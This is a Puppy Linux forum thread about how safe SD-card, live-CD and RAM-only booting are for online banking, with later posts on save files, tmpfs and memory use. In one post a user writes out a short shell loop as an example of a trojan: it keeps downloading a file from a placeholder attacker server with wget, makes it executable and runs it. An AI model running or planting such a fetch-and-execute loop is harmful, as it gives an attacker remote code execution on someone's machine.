How secure is booting from internal SD card?

Aung
Posts: 144
Joined: Sat 20 Jan 2007, 03:30
Location: Hervey Bay

#1 Post by Aung »

I wish to know if booting from an SD card is as secure as booting from a live CD. I have tried booting with the switch on the SD card turned to lock (no writing to SD card) but Puppy doesn't finish booting. Firewall is always on. Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted?
Sometimes when internet banking I 'show desktop' to see if any of the drive icons are lit up. I notice that when Puppy is starting up it can peer into the drives to find the savefiles. Does that mean that once a cracker is inside one's box they could do the same?

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#2 Post by mikeb »

If you can find a way for a 'cracker' to get into yer puppy then start panicking.

Done internet banking on windows and linux for many years...running mainly from hard drive.
One caveat...NEVER EVER use Internet Explorer/Outlook Express which would be difficult on linux anyway.

No saved passwords and I suppose you could go for a don't save at shutdown option if it makes you feel better.
Your sdcard will be fine.....only real danger is someone stealing yer SD card if you DID save passwords. By the way my bank logs in without using passwords but instead a series of random predefined questions...seems a better idea.

No firewall apart from the one in the router which shows as stealth on shields up.

mike

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#3 Post by rufwoof »

Aung wrote: Is it possible for a cracker to get past the firewall and get access to my hard drive or SD card WITHOUT the drive desktop icons showing that the drives are mounted.
Yes.

Many cracks are like vamps - they gain access by being invited in. Trojans that piggy-back into your system. A really simple virus could be as trivial as a repeated while loop - perhaps something along the lines of

while :
do
    wget attackers_server/filename?somestring >/tmp/try
    chmod a+x /tmp/try
    /tmp/try &
    sleep 3
done

that repeatedly tries code (script) sent from the hackers server (and that also gets fed some info in the somestring parameter passed to that server (I know, not the best of example scripts, but you get the idea)).

An intent hacker would obviously utilise something a lot more sophisticated. Low level code that might not even reveal that a drive had been mounted. Not even read only boot CDs are immune to such risk as the process could have been 'downloaded' to and be running in memory. The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your bank's web site, as that greatly reduces the risk of catching such a virus.

If the opsys and/or browser have been used to visit any other web sites (or read emails, install progs etc.) at any prior time whilst having write access enabled, then there is a risk that it could have been compromised. Obviously a read only CD is more assured in that sense.

Another trick is to spoof your opsys and browser. Change the USER-AGENT from telling every site you visit that you're running x version of linux and y version of browser to I'm running Windows and another version (or type) of browser. You want the spoofed choices to be relatively close to what you are running otherwise you'll hit problems with some web sites throwing you content that's inappropriate to your actual setup (or refusing to provide content because they don't know how to handle that choice of opsys/browser).
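
An added example, not written by anyone in this thread: instead of judging by desktop drive icons, the question from post #1 can be checked against the kernel's own mount table. The function names and the sample table below are constructed for illustration; on a live system call audit_mounts with no argument to read /proc/mounts.

```shell
#!/bin/sh
# Constructed sample in /proc/mounts format:
#   device mountpoint fstype options dump pass
SAMPLE_MOUNTS='rootfs / rootfs rw 0 0
tmpfs /initrd/pup_rw tmpfs rw,relatime 0 0
/dev/loop0 /initrd/pup_ro2 squashfs ro,noatime 0 0
/dev/sdb1 /mnt/sdb1 vfat rw,noatime,fmask=0022 0 0
/dev/sda1 /mnt/sda1 ext3 ro,relatime 0 0
/dev/sr0 /mnt/sr0 iso9660 ro,relatime 0 0'

# list_disk_mounts [FILE]
# Print "device mountpoint ro|rw" for every mounted hard drive, SD card or
# flash partition. FILE defaults to /proc/mounts; "-" reads standard input.
# Loop devices, tmpfs and optical drives (/dev/sr*) are skipped on purpose.
list_disk_mounts() {
    awk '$1 ~ /^\/dev\/(sd|hd|mmcblk|nvme)/ {
        n = split($4, opt, ",")
        mode = "rw"                       # a mount is writable unless "ro" is set
        for (i = 1; i <= n; i++)
            if (opt[i] == "ro") mode = "ro"
        print $1, $2, mode
    }' "${1:-/proc/mounts}"
}

# writable_disk_mounts [FILE]
# Only the partitions a running process could currently write to.
writable_disk_mounts() {
    list_disk_mounts "$@" | awk '$3 == "rw" { print $1 }'
}

# audit_mounts [FILE]
# Exit status 0 when no disk partition is mounted read-write, 1 otherwise,
# so it can gate a "start the banking browser" launcher script.
audit_mounts() {
    found=$(writable_disk_mounts "$@")
    if [ -n "$found" ]; then
        echo "mounted read-write: $found"
        return 1
    fi
    echo "no hard drive or SD card partition is mounted read-write"
    return 0
}

# Demonstration on the constructed sample (prints two lines: sdb1 rw, sda1 ro).
printf '%s\n' "$SAMPLE_MOUNTS" | list_disk_mounts -
```

This replaces the icon check only: a root process can read a block device directly without mounting it, and kernel-level malware can falsify the mount table, so the clean-boot advice in the post above still applies.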

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#4 Post by mikeb »

Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable and then run.... and don't even bother asking for actual instances of this happening.

mike

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#5 Post by rufwoof »

mikeb wrote: Ok and once again there will be not a shred of information on how these viruses will be added to your system, made executable and then run.... and don't even bother asking for actual instances of this happening.
I've previously sidestepped your repeated statements such as above Mike as I have no desire to cause upset nor argument. However you repeatedly say that you've been running Windows and Linux with minimal protection and not encountered problems yourself, stressing that it's primarily just Windows and in particular Explorer/Outlook that are the risks - but it's been widely accepted for years that the risks are more widespread. http://www.internetnews.com/dev-news/ar ... hp/3601946 Nor is running Linux inherently safe for the more casual user.

Yes the risks have been reduced by centralising software distribution via responsibly run/maintained repositories - but not all users obtain all of their software solely via such verified/content-validated repositories.

I've only been using Linux LiveCDs for a couple of months and in the early days of that whilst looking around for an appropriate choice found some distros with 8+ rootkits being reported.

Real and present.

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#6 Post by mikeb »

rufwoof wrote: 8+ rootkits being reported.
ok details would be interesting...not just for me but as a warning for others.
I hear lots of talk and potential threats...but details of real occurrences would be a real bonus to quantify and clarify the situation.

I am serious about security...I don't want viruses...just happens my approach seems simple and effective. I could claim it gives MAXIMUM protection since my results are better than those who run antivirus software.

Mike

James C
Posts: 6618
Joined: Thu 26 Mar 2009, 05:12
Location: Kentucky

#7 Post by James C »

The main threat to computer security is the person using the keyboard.

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#8 Post by mikeb »

James C wrote: The main threat to computer security is ... keyboard.
The only way left after other measures have been taken.

Does this not bring us to the running as root argument ...after all not running as administrator on windows is considered prudent?

Bit torrent and gnutella are the home of manually installed windows viruses...are linux repos going to be the same?

mike

Aung
Posts: 144
Joined: Sat 20 Jan 2007, 03:30
Location: Hervey Bay

#9 Post by Aung »

'No saved passwords and I suppose you could go for a don't save at shutdown option'

I don't save passwords but with Firefox that also seems to mean not to save form information also.

'The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,'

That's a bit unpractical, apart from banking I am traveling and need to buy airline tickets online, deal with a forex company to send my age pension to myself.

'Obviously a read only CD is more assured in that sense.'

Exactly, if only someone would make a 64 bit Slick Puppy with only, full networking so that every different modem could get online, firewall, Geany for saving details of receipts, Firefox or chrome, most secure browsers, mtpaint for taking a snapshot of the screen before and after pressing the submit button, even just vesa so that there is no need to lump around 30 mb of video card firmware.

'Another trick is to spoof your opsys and browser. Change the USER-AGENT'
Haven't got a clue what a user agent is, but you are seeming to say it is not the way to go.

'No firewall apart from the one in the router which shows as stealth on shields up.'

Been to shield up with previous Puppies, don't know enough about ports to understand what shield up is saying but Puppy's firewall shows up as being stealthy.

'The main threat to computer security is the person using the keyboard.'

That's a lot of help!! BUT you are talking about me and a lot of people who use Puppy for banking and the like that don't know how ports are hardwired into a computer (or operating system).
I have looked into the Fatdog CD in the help folder, help.msg and I can't see a line for booting into RAM but using the save file on SD card for my window settings, etc., only, not for saving to while on the net.
Is it possible to boot from SD card into RAM, BUT using the savefile on the SD card BUT keeping the SD card READ only? As far as I can understand a live CD boots into RAM and only saves data if one chooses on shutdown. After I finish banking using live CD, I close the browser, my data is still in RAM, then I go off the net, data is still in RAM, then I open Fatdog from the desktop icon (hoping that it hasn't been opened while I was on the net) and then send my data in RAM to Fatdog on the hard drive. Can this be done with an SD card (built in SD slot seen as an internal drive seen as sdb1 not USB)?

amigo
Posts: 2629
Joined: Mon 02 Apr 2007, 06:52

#10 Post by amigo »

By definition, a save-file has to be read-write - at least at the time of saving, and booting to RAM usually means starting with a clean slate - without your saved network settings (and others).

In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#11 Post by rufwoof »

rufwoof wrote: The trick is to have a clean opsys and browser that's not used to go anywhere else either before or after visiting your banks web site,
Aung wrote: Thats a bit unpractical, apart from banking I am traveling and need to but airline tickets online, deal with a forex company to send my age pension to myself.
533t_vesa_mesa.iso (or 533t_nvidia.iso for systems with Nvidia graphics card) weighs in at 250MB (260MB), but only around 100MB for the Puppy ISO part (rest is extras i.e. SFS's that can be loaded for flash, abi/gnumeric, openshot/audacity). https://drive.google.com/folderview?id= ... sp=sharing

i.e. puppy sfs is around 70MB with another 25MB of drivers (zdrv sfs).

Typically takes less than 3 minutes (obviously with familiarity, longer for first time/learning) to get to bank's web site via: boot CD, at desktop click connect and establish internet connection, open HOME and run quick_firewall_and_sound, set locale (restartX) and download/load latest firefox (HOME firefox file). That is however via a reasonably fast internet link (firefox download is around 30MB and on my 50Mb link speed takes just a few seconds to download).

Go to bank/online accounts - nowhere else before or after. Shutdown/reboot afterwards. i.e. booted from read only CD into RAM, new browser downloaded into and run from RAM, nowhere else before or after other than bank web site, HD's not even mounted.

For other stuff, boot as normal, load up abiword/gnumeric, flash, multi-media and use as desired. Encounter a virus and shutdown/restart and you're back to a clean system again.

I save all data (spreadsheets, documents etc) to a HD (could be a USB i.e. outside of Puppy space), so persistence from one session to another isn't required (no save file). I do also have a portable-firefox on the HD so that all bookmarks, extensions etc come all ready to go, but I run that with it in the back of my mind that it's potentially unsafe.

The somewhat crude guide document (PDF) I've created for those that 'distro' is located at https://drive.google.com/file/d/0B4MbXu ... sp=sharing

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#12 Post by rufwoof »

Just timed the larger one (nvidia, Puppy SFS 78MB, drivers 34MB) and from complete power off to having a browser window up/running (booted, connected, firewall, set locale, restart x, download firefox) took 2 mins 40 seconds (25 seconds of that was the time to load the puppy sfs from CD during the boot process).

Not that unpractical ?!

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#13 Post by mikeb »

Aung wrote: I dont save passwords but with Firefox that also seams to mean not to save form information also.
Yes that got messed up with firefox 3.5 plus... my semi fix is to click 'clear history when closes.'.. tick what you want and advanced and then unclick it again.. seems to make form saving work without passwords then as otherwise it does not do what the settings says it should.

A bit like cookie blocking only seems to work when you are in cookie approval mode.

Shields up... well that's probably your router doing its job which is stealth = hidden

I just boot normal system and bank online.
I drink tap water too :D

mike

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#14 Post by rufwoof »

amigo wrote: By definition, a save-file has to be read-write - at least at the time of saving, and booting to RAM usually means starting with a clean slate - without your saved network settings (and others).

In the end, yes, running from an SD card is just as *in*secure as booting puppy in any other fashion... running from a live, read-only system doesn't make you any safer -it just makes your 'pristine system' restorable/recoverable.
I boot ram each and every time, so 'savefile' space is all of RAM (select the 'don't save' option at shutdown). So each and every session is pristine new. If I'm banking, I download the latest firefox direct from Mozilla, no plug-ins or extensions, go straight to bank's web site, nowhere else either before or after (shutdown/reboot to clear memory). No HD's even mounted, all running in RAM from read only CD/DVD.

That's comparable to a frugal puppy pfix=ram - where no save file is loaded. Perhaps a bit safer because with frugal the puppy sfs (and drivers) might be being read from a read/write device (hard disk) assuming you had those copied over when you set up the frugal (even with frugal however you can overwrite that with a pmedia boot parameter).

As Mike suggests however, don't worry too much about it, there are plenty of bigger fish that hackers/thieves will go after. If caught hacking the penalties are high, and it can be very difficult for them to completely cover their tracks - so instead they're more likely to go after easier/more rewarding prey (cash/ATM points, card scanning etc.).

I only run things the way I do because I don't like full installs as I often mess things up and getting back to how things were before is more of a pain with full installs IMO (I don't back up as often as I should and things always seem to trash when it's been too long since I did a backup (or the backup fails to recover)). I also don't like running with GRUB and would rather the HD was untouched other than whatever data files I opt to read/write to the HD. Also with savefiles even though if I keep regular backups, I either seem to exhaust savefile space at inopportune times and/or I get mixed up with which historic version I need to roll back to to get back to a 'how it was before - but not having lost too much stuff' state. I find that overall keeping opsys/gui (CD) completely separate from data (HD) works best for me (LiveCD).

I'm casual about where I surf to when in non-banking mode/sessions, caring little about the repercussions of what I try or do (PETs etc) as I know that the next session will be back to the original form. With full installs a single slip can result in having to spend an hour or more undoing/repairing stuff.

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#15 Post by mikeb »

hmm ...drifting into the area of save methods.... my usual way with puppy is to run using tmpfs and create a save sfs at shutdown which gets loaded at the next boot back into tmpfs.... if I want to I can choose not to save at shutdown so will revert to the last save on the next boot...handy when testing software for example but would provide a 'no save' environment if desired... basically used the multisession cd idea and applied it to hard drive and usb use.

As mentioned it all becomes pretty unbreakable. Save space = ram plus swap space in effect so works a little differently and not overusing the save space is a good idea anyway.

It also means in usage terms its no different to a save file when it comes to boot times and convenience.

A variant on this theme is making a sfs of say a first run and using that... a snap shot of the basic setup in other words.
Or make a remaster just for the purpose and include system settings. (/etc)

SD card save means the save file is mounted so the card cannot be released even though changes are in ram/tmpfs.
The tmpfs is copied to the save file periodically unless disabled and at shutdown unless bypassed.

mike

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#16 Post by rufwoof »

mikeb wrote: my usual way with puppy is to run using tmpfs and create a save sfs at shutdown which gets loaded at the next boot back into tmpfs.... if I want to I can choose not to save at shutdown so will revert to the last save on the next boot.
Sounds interesting, but over my head. Is that creating a sfs of /initrd/pup_rw using something like mksquashfs at shutdown and then loading that sfs at bootup?

If so my /initrd/pup_rw is 1750MB total with 125MB used - I would have thought that it could take quite a while to 'shutdown' (create sfs) ???

One thing that's bothered me is that despite having 1.5GB of RAM, my 'savefile' icon in the tray always shows that 1.7GB in total available. Is it just assigning 200MB out of the 2GB swap partition space I've created/allocated? At the time I just created swap to be larger than the amount of actual memory, thinking that was a reasonable choice. But perhaps 200MB might have been a better choice ?

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#17 Post by mikeb »

Yes the tmpfs layer must be adding swap space to calculate its size and can therefore be larger than your actual ram.

No harm in having a larger swap although its obviously going to use some of your hard drive. As you can see you have plenty of room though without the swap the tmpfs has to be shared with software ram usage and /tmp, shm etc if used.... eg in your case a figure of ~900MB is more likely for pup_rw without swap. I quite like having room to spare as its handy for such as printing and some flash video.

In your case the 125MB of data would be saved (such as /tmp are not which may be in that 125mb).... I normally use it uncompressed so it's the time it takes to write 125mb... about 2 seconds on my crusty olde systems. To usb would be slower I expect and light compression might be worth considering...there are some builds of mksquashfs using low compression for sfs which adds around 20% but gives a major speed increase and of course reduces the file to be saved compared to uncompressed...something I have toyed with. (originally I used tar but puppies initrd only supported a crappy version of it)

Another one to consider are things like browser caches being saved so always worth looking at ways to keep trim. My saves are usually between 30 and 60MB which only takes half a second to create and load.

All good stuff

Mike

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#18 Post by rufwoof »

Thanks.

I'll stick with just running in ram - with the option to create a savefile as and when needed (until another remastered puppy sfs is performed).

One thing I've just noticed is that under load/stress testing, running with ram uses a lot less of memory space than when running with a savefile. Loaded up Openshot running blender to create a 3D animated title, mplayer watching a video, firefox with one window running a youtube, another watching BBC news video, a range of others on other web sites; abiword, gnumeric, galculator, leafpad, mtpaint all running; audacity loaded, xvidcap running to capture the desktop video (screencast) - and in total got up to using just over 700MB of memory according to HTOP - with all of 4MB of swap having been used.

From what I remember, running with a savefile and memory usage was higher when loaded up to a similar heavy load.

More a case of the single CPU being the bottleneck (100% loaded), memory much less of an issue.

mikeb
Posts: 11297
Joined: Thu 23 Nov 2006, 13:56

#19 Post by mikeb »

Can't remember if this was a usb or hard drive save file in your case.

Tmpfs/pup_rw does not show up in memory usage but the kernel still accounts for it.... so if you are running in ram only, that which is free for applications will be reduced and such apps will normally request less memory or the kernel will make it so (watch for example how firefox usage drops if something else fills yer ram.) With a save file and no tmpfs (hard drive) then more ram is available therefore apps can take more cos they can....so it can appear as if more is being USED but really more is being ALLOCATED because more is available.

That's just a simplistic view but you get the idea, I hope, of why there appears to be a variance... the demands of aufs will be pretty much the same and usually amounts to only a few MB.

Hope that makes some sense.

mike

rufwoof
Posts: 3690
Joined: Mon 24 Feb 2014, 17:47

#20 Post by rufwoof »

Thanks Mike. Get the idea, thanks.
